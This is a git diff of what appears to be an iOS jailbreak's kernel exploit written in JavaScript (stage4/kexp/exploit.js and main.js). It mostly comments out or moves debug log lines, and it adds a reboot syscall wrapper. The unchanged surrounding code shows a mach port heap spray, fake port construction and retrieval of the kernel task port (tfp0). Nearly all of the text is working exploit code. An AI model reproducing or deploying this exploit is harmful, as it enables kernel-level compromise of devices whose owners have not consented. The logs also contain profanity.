diff options
Diffstat (limited to 'src/stage4')
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 26 | ||||
| -rw-r--r-- | src/stage4/main.js | 3 |
2 files changed, 16 insertions, 13 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 741f217..e761184 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -360,22 +360,22 @@ function r3gister(task, init_port_set, real_count, fake_count) { } function mach_ports_lookup_shit() { - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); var arrz = shit_heap(4); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); write_u32(arrz, 0); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); var sz = shit_heap(4);; - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); write_u32(sz, 3); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); // var mts = mach_task_self(); p0laris_log("fuck\n"); calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); - puts("helo"); - p0laris_log("mpl success\n"); - p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); - p0laris_log("mpl success\n"); +// puts("helo"); +// p0laris_log("mpl success\n"); +// p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); +// p0laris_log("mpl success\n"); return read_u32(read_u32(arrz) + 8); // return 0x42603; @@ -460,7 +460,7 @@ again: while (true) { // for (var i = 0; i < 8; i++) { var dummy = shit_heap(4); if (i % 4 == 0) { - p0laris_log("spray_ports %d\n", i); +// p0laris_log("spray_ports %d\n", i); } write_u32(fp + (i << 2), spray_ports(1)); spray(small_buf, read_u32(small_size), dummy); @@ -470,7 +470,7 @@ again: while (true) { for (var i = 0; i < PORTS_NUM; i++) { // for (var i = 0; i < 8; i++) { if (i % 4 == 0) { - p0laris_log("release_port_ptrs %d\n", i); +// p0laris_log("release_port_ptrs %d\n", i); } release_port_ptrs(read_u32(fp + (i << 2))); } @@ -487,13 +487,13 @@ again: while (true) { write_u32(sz, 3); // mach_ports_lookup_shit_dealloc(); var ret__ = r3gister(mach_task_self(), arrz, 2, 3); + p0laris_log("%d %s\n", ret__, mach_error_string(ret__)); + p0laris_log("r3gister done\n"); mach_ports_lookup(mach_task_self(), arrz, sz); p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); p0laris_log("mpl success\n"); var fake_port = read_u32(read_u32(arrz) + 8); - p0laris_log("%d %s\n", ret__, mach_error_string(ret__)); - p0laris_log("r3gister done\n"); // while (true) { // // } diff --git a/src/stage4/main.js b/src/stage4/main.js index af2ed69..89caddb 100644 --- a/src/stage4/main.js +++ b/src/stage4/main.js @@ -7,6 +7,7 @@ var listen = scall_wrapper("listen"); var accept = scall_wrapper("accept"); var close = scall_wrapper("close"); var printf = scall_wrapper("printf"); +var reboot = scall_wrapper("reboot"); var AF_INET = 2; var SOCK_DGRAM = 2; var SOCK_DGRAM = 2; @@ -38,6 +39,8 @@ function main() { sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide; prep_shit(); +// reboot(); + var tfp0 = get_kernel_task(); syslog(LOG_SYSLOG, "__p0laris_LOG_END__"); |